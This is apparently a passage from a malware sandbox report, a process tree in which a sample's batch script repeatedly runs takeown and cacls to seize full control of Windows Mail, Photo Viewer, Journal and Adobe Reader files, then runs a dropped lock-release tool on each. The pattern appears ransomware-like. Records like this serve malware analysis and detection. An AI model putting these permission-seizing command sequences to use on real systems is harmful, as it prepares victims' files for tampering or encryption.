C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:1836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵
- Loads dropped DLL
PID:1536 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:1388
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1672
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui""2⤵
- Loads dropped DLL
PID:1720 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:1944
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "WinMail.exe.mui" -nobanner3⤵
- Loads dropped DLL
PID:1608 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "WinMail.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:612
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:1992
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:840
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:1640
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "msoeres.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:708
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:1040
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:1824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:432
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:1548
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "ImagingDevices.exe" -nobanner4⤵PID:1488
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1164
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Mail\WinMail.exe""2⤵PID:912
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:652
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\WinMail.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1464
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "WinMail.exe" -nobanner3⤵PID:748
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "WinMail.exe" -nobanner4⤵PID:604
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Mail\wabmig.exe""2⤵PID:1268
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:1196
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wabmig.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "wabmig.exe" -nobanner3⤵PID:1388
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "wabmig.exe" -nobanner4⤵PID:816
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Mail\wab.exe""2⤵PID:1752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:1220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wab.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "wab.exe" -nobanner3⤵PID:1608
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "wab.exe" -nobanner4⤵PID:520
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1464
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Journal\en-US\Journal.exe.mui""2⤵PID:740
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\Journal.exe.mui" /E /G Admin:F /C3⤵PID:1580
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\Journal.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "Journal.exe.mui" -nobanner3⤵PID:1640
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "Journal.exe.mui" -nobanner4⤵PID:820
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1992
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Journal\Templates\Genko_1.jtp""2⤵PID:816
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Genko_1.jtp" /E /G Admin:F /C3⤵PID:432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Genko_1.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "Genko_1.jtp" -nobanner3⤵PID:924
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "Genko_1.jtp" -nobanner4⤵PID:1220
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1816
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp""2⤵PID:520
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp" /E /G Admin:F /C3⤵PID:1464
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1368
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "To_Do_List.jtp" -nobanner3⤵PID:1064
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "To_Do_List.jtp" -nobanner4⤵PID:788
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:1388
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:544
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1120
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:1220
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:1720
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""2⤵PID:1608
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C3⤵PID:960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"3⤵PID:1444
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "AGMGPUOptIn.ini" -nobanner3⤵PID:860
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "AGMGPUOptIn.ini" -nobanner4⤵PID:1416
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""2⤵PID:932
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C3⤵PID:1760
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"3⤵
- Modifies file permissions
PID:1056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "LogTransport2.exe" -nobanner3⤵PID:820
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "LogTransport2.exe" -nobanner4⤵PID:912
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1640
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""2⤵PID:520
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C3⤵PID:324
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"3⤵
- Modifies file permissions
PID:1040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "AcroSign.prc" -nobanner3⤵PID:1120
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "AcroSign.prc" -nobanner4⤵PID:1312
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""2⤵PID:1796
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C3⤵PID:1464
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"3⤵PID:1188
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "AUMProduct.cer" -nobanner3⤵PID:1944
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "AUMProduct.cer" -nobanner4⤵PID:1460
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:336
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""2⤵PID:1724
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C3⤵PID:1480
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"3⤵
- Modifies file permissions
PID:1652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "cryptocme2.sig" -nobanner3⤵PID:788
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "cryptocme2.sig" -nobanner4⤵PID:1528
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""2⤵PID:1428
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C3⤵PID:1848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"3⤵PID:1400
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "eula.ini" -nobanner3⤵PID:1816
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "eula.ini" -nobanner4⤵PID:1880
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1536
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""2⤵PID:1020
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C3⤵PID:1548
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"3⤵PID:1768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "license.html" -nobanner3⤵PID:604
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "license.html" -nobanner4⤵PID:1036
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1500
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""2⤵PID:1832
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C3⤵PID:1480
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"3⤵PID:284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "adobepdf.xdc" -nobanner3⤵PID:1196
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "adobepdf.xdc" -nobanner4⤵PID:1528
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1860
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""2⤵PID:932
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C3⤵PID:612
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"3⤵PID:924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "create_form.gif" -nobanner3⤵PID:1864
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "create_form.gif" -nobanner4⤵PID:816
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""2⤵PID:520
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C3⤵PID:1444
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"3⤵PID:1460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "forms_super.gif" -nobanner3⤵PID:1036
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "forms_super.gif" -nobanner4⤵PID:1080
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""2⤵PID:432
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C3⤵PID:1056
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"3⤵PID:284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "reviews_sent.gif" -nobanner3⤵PID:1804
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "reviews_sent.gif" -nobanner4⤵PID:1972
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""2⤵PID:1724
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C3⤵PID:544
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"3⤵
- Modifies file permissions
PID:1572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "email_all.gif" -nobanner3⤵PID:1312
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "email_all.gif" -nobanner4⤵PID:1164
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1536
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""2⤵PID:1428
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C3⤵PID:1848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"3⤵PID:1768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "server_lg.gif" -nobanner3⤵PID:316
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "server_lg.gif" -nobanner4⤵PID:1796
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1080
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""2⤵PID:1248
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C3⤵PID:1548
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"3⤵PID:996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "info.gif" -nobanner3⤵PID:1056
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "info.gif" -nobanner4⤵PID:284
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1288
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""2⤵PID:1488
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C3⤵PID:1752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"3⤵
- Modifies file permissions
PID:364
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "turnOffNotificationInTray.gif" -nobanner3⤵PID:544
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "turnOffNotificationInTray.gif" -nobanner4⤵PID:1572
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1164
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""2⤵PID:816
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C3⤵PID:944
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"3⤵PID:1728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "review_browser.gif" -nobanner3⤵PID:1848
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "review_browser.gif" -nobanner4⤵PID:1768
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""2⤵PID:1032
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C3⤵PID:748
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"3⤵
- Modifies file permissions
PID:1608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "CourierStd-Bold.otf" -nobanner3⤵PID:1548
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "CourierStd-Bold.otf" -nobanner4⤵PID:996
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""2⤵PID:1804
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C3⤵PID:2020
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"3⤵
- Modifies file permissions
PID:936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "MyriadPro-Bold.otf" -nobanner3⤵PID:1752
-
